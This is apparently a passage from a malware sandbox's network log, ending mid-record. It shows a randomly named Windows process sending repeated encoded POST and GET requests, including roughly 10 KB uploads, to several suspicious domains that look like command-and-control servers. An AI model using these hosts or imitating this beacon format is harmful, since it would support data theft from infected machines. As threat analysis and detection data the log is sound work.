Dec 6, 2024 09:33:14.391096115 CET | 414 | OUT | GET /jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Dec 6, 2024 09:33:15.400970936 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 06 Dec 2024 08:33:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: e0f60478e28ea1af06b0b470b1b6a3fa-bos-edge4
                                                                                                            Expires: Fri, 06 Dec 2024 08:33:14 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            5 | 192.168.2.4 | 49870 | 13.248.169.48 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:21.086631060 CET | 676 | OUT | POST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3p8zLOV14BgdpQabwT7LDCZFAyDzS2gqYdw==
                                                                                                            Dec 6, 2024 09:33:22.206442118 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            6 | 192.168.2.4 | 49877 | 13.248.169.48 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:23.755806923 CET | 696 | OUT | POST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZhzvE6m7jXRGxgEEbmZjmNqPNNrHtbvR+U=
                                                                                                            Dec 6, 2024 09:33:24.839090109 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            7 | 192.168.2.4 | 49883 | 13.248.169.48 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:26.417774916 CET | 10778 | OUT | POST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH= [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:27.501828909 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            8 | 192.168.2.4 | 49893 | 13.248.169.48 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:29.078272104 CET | 410 | OUT | GET /wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:30.175510883 CET | 382 | IN | HTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Fri, 06 Dec 2024 08:33:30 GMT
                                                                                                            content-length: 261
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR"}</script></head></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            9 | 192.168.2.4 | 49909 | 66.29.149.46 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:35.718354940 CET | 679 | OUT | POST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStP+6Lvk340tfNnIpwKIjHr178OV5uVSoA1Q==
                                                                                                            Dec 6, 2024 09:33:36.940644979 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:36 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            10 | 192.168.2.4 | 49915 | 66.29.149.46 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:38.385524035 CET | 699 | OUT | POST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51fPTSwaYRVJuWHhtRq9JaYVmf1aB2W3S+c=
                                                                                                            Dec 6, 2024 09:33:39.594408989 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:39 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            11 | 192.168.2.4 | 49922 | 66.29.149.46 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:41.053081989 CET | 10781 | OUT | POST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH= [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:42.341586113 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:42 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            12 | 192.168.2.4 | 49928 | 66.29.149.46 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:43.704458952 CET | 411 | OUT | GET /r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:44.927356005 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:44 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            13 | 192.168.2.4 | 49944 | 3.33.130.190 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:50.599488020 CET | 673 | OUT | POST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKBRe7hRIbymUA5mqsZUYYQKGDxxhLL6FZSQ==
                                                                                                            Dec 6, 2024 09:33:51.680159092 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            14 | 192.168.2.4 | 49954 | 3.33.130.190 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:53.275473118 CET | 693 | OUT | POST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCKiws2o/G54QJeI1CFwif3M0nntItIlEZFw=
                                                                                                            Dec 6, 2024 09:33:54.352587938 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            15 | 192.168.2.4 | 49960 | 3.33.130.190 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:55.942903042 CET | 10775 | OUT | POST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH= [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:57.024739981 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            16 | 192.168.2.4 | 49967 | 3.33.130.190 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:33:58.593664885 CET | 409 | OUT | GET /rbqc/?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:59.682074070 CET | 382 | IN | HTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Fri, 06 Dec 2024 08:33:59 GMT
                                                                                                            content-length: 261
                                                                                                            connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR"}</script></head></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            17 | 192.168.2.4 | 49983 | 129.226.153.85 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:34:05.413283110 CET | 682 | OUT | POST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoIK82d0lxK8H4kaLaD/0tiaO4aWK+ZokFJKQ==
                                                                                                            Dec 6, 2024 09:34:06.936852932 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:06 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            18 | 192.168.2.4 | 49989 | 129.226.153.85 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:34:08.083704948 CET | 702 | OUT | POST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOcpLN3tln4ARV3B4Gxb+7AZ+XtrNAolKJE=
                                                                                                            Dec 6, 2024 09:34:09.608288050 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:09 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
